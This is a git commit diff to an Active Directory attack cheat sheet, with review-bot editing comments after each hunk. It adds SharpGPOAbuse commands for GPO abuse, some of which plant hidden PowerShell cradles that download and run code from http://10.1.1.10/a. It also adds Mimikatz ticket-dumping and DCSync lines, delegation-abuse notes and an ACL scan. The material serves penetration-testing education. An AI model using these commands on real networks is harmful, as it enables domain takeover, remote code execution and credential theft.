Kerberos AD GPO

Swissky 2020-01-05 16:28:00 +01:00
parent b052f78d95
commit 73abdeed71


@ -10,6 +10,7 @@
- [Open Shares](#open-shares) - [Open Shares](#open-shares)
- [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share) - [SCF and URL file attack against writeable share](#scf-and-url-file-attack-against-writeable-share)
- [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences) - [Passwords in SYSVOL & Group Policy Preferences](#passwords-in-sysvol-&-group-policy-preferences)
- [Exploit Group Policy Objects GPO](#exploit-group-policy-objects-gpo)
- [Dumping AD Domain Credentials](#dumping-ad-domain-credentials) - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials)
- [Using ndtsutil](#using-ndtsutil) - [Using ndtsutil](#using-ndtsutil)
- [Using Vshadow](#using-vshadow) - [Using Vshadow](#using-vshadow)
@ -47,13 +48,13 @@
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
- [Trust relationship between domains](#trust-relationship-between-domains) - [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Unconstrained delegation](#unconstrained-delegation) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation)
- [Find delegation](#find-delegation) - [Find delegation](#find-delegation)
- [Monitor with Rubeus](#monitor-with-rubeus) - [Monitor with Rubeus](#monitor-with-rubeus)
- [Force a connect back from the DC](#force-a-connect-back-from-the-dc) - [Force a connect back from the DC](#force-a-connect-back-from-the-dc)
- [Load the ticket](#load-the-ticket) - [Load the ticket](#load-the-ticket)
- [Mitigation](#mitigation) - [Mitigation](#mitigation)
- [Resource-Based Constrained Delegation](#resource-based-constrained-delegation) - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
- [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [Relay delegation with mitm6](#relay-delegation-with-mitm6)
- [PrivExchange attack](#privexchange-attack) - [PrivExchange attack](#privexchange-attack)
- [PXE Boot image attack](#pxe-boot-image-attack) - [PXE Boot image attack](#pxe-boot-image-attack)
@ -389,6 +390,23 @@ Get-NetGPOGroup
* Delete existing GPP xml files in SYSVOL containing passwords. * Delete existing GPP xml files in SYSVOL containing passwords.
* Dont put passwords in files that are accessible by all authenticated users. * Dont put passwords in files that are accessible by all authenticated users.
### Exploit Group Policy Objects GPO
```powershell
# Adding User Rights
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
# Adding a Local Admin
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
# Configuring a User or Computer Logon Script
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
# Configuring a Computer or User Immediate Task
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
```
### Dumping AD Domain Credentials ### Dumping AD Domain Credentials
You will need the following files to extract the ntds : You will need the following files to extract the ntds :
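Review bot: the new "Exploit Group Policy Objects GPO" block states no prerequisite, yet every SharpGPOAbuse command in it assumes the current user can write to "Vulnerable GPO" (write on the GPO object and on its folder under SYSVOL); say so explicitly and point back to the enumeration that precedes this block (the hunk header shows `Get-NetGPOGroup`) so the reader knows how to find such a GPO, and link the tool (https://github.com/FSecureLABS/SharpGPOAbuse). The two comments "Configuring a User or Computer Logon Script" and "Configuring a Computer or User Immediate Task" promise both variants but each shows only one; either show the counterparts (`--AddComputerScript`, `--AddUserTask`) or narrow the comments to what is actually run, since user and computer settings live in different parts of the GPO and apply to different principals. Finally, add one line saying the change only takes effect on the next Group Policy refresh (by default up to 90 minutes plus a random offset) or when `gpupdate /force` runs on a target, otherwise readers will assume the local-admin or task settings are immediate.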
@ -1011,6 +1029,12 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount
Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync
``` ```
Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner).
```powershell
ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show
```
### Trust relationship between domains ### Trust relationship between domains
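Review bot: "Check ACL for an User" should read "Check ACLs for a user". In the ADACLScan command, the base DN is written with semicolons (`"DC=contoso;DC=com"`) whereas a distinguished name uses commas; if that is a syntax the script itself expects, say so in a short comment, otherwise change it to `"DC=contoso,DC=com"` so readers do not copy a malformed DN. It would also help to state what the reader is looking for in the HTML output (the effective rights of `User1` on objects with `AdminCount=1`, i.e. the protected accounts the surrounding `Add-ObjectAcl` examples target), since the command as written gives no hint of why it sits in the ACL-abuse section.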
@ -1047,10 +1071,17 @@ Prerequisite:
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
``` ```
### Unconstrained delegation ### Kerberos Unconstrained Delegation
> The user sends a TGS to access the service, along with their TGT, and then the service can use the users TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html > The user sends a TGS to access the service, along with their TGT, and then the service can use the users TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
Domain Compromise via DC Print Server and Unconstrained Delegation
Prerequisites:
- Object with Property "Trust this computer for delegation to any service (Kerberos only)"
- Must have ADS_UF_TRUSTED_FOR_DELEGATION
- Must not have ADS_UF_NOT_DELEGATED flag
#### Find delegation #### Find delegation
Check the `TrustedForDelegation` property. Check the `TrustedForDelegation` property.
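Review bot: the three new prerequisite bullets conflate two different principals. "Trust this computer for delegation to any service (Kerberos only)" and "Must have ADS_UF_TRUSTED_FOR_DELEGATION" are the same condition (the checkbox sets that `userAccountControl` flag) and both describe the compromised host that receives forwarded TGTs; "Must not have ADS_UF_NOT_DELEGATED" describes the account whose TGT is to be captured (here the DC machine account coerced via the print spooler), and that account must also not be in Protected Users. Merge the first two bullets and label which object each condition applies to. The bare line "Domain Compromise via DC Print Server and Unconstrained Delegation" reads like a reference title but carries no link; either link it or move it to the References list at the end of the file.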
@ -1097,7 +1128,9 @@ Extract the base64 TGT from Rubeus output and load it to our current session.
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt .\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
``` ```
Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt` Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`
#### Mitigation #### Mitigation
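Review bot: `sekurlsa::tickets` on its own only lists the tickets held in LSASS; to obtain a reusable ticket the command needs `/export`, which writes `.kirbi` files that can then be loaded with `kerberos::ptt <file>`. It should also be stated that `sekurlsa::` commands require local admin or SYSTEM on the host (the same host where Rubeus monitor runs). Unchanged here but worth fixing in the same touch: the line above, `.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt`, does not match the sentence introducing it ("load it to our current session"), because `asktgs` requests a service ticket and requires a `/service:` SPN; injecting the captured TGT itself is `Rubeus.exe ptt /ticket:<ticket base64>`.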
@ -1105,7 +1138,7 @@ Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HAC
* Ensure sensitive accounts cannot be delegated * Ensure sensitive accounts cannot be delegated
* Disable the Print Spooler Service * Disable the Print Spooler Service
### Resource-Based Constrained Delegation ### Kerberos Resource Based Constrained Delegation
Resource-based Constrained Delegation was introduced in Windows Server 2012. Resource-based Constrained Delegation was introduced in Windows Server 2012.
@ -1469,4 +1502,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 6b3723410a3c5
* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) * [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic)
* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) * [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https:/www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/)
* [SMB Share SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) * [SMB Share SCF File Attacks - December 13, 2017 - @netbiosX](pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/)
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) * [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
* [A Red Teamers Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
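Review bot: the new reference uses "APRIL 2, 2018" while the neighbouring entries write dates as "Jun 11, 2019" and "December 13, 2017"; use the same casing for consistency. While editing this list, two adjacent context entries have broken links that will not resolve when rendered: `https:/www.sqlshack.com/...` is missing a slash and `pentestlab.blog/2017/12/13/...` has no scheme.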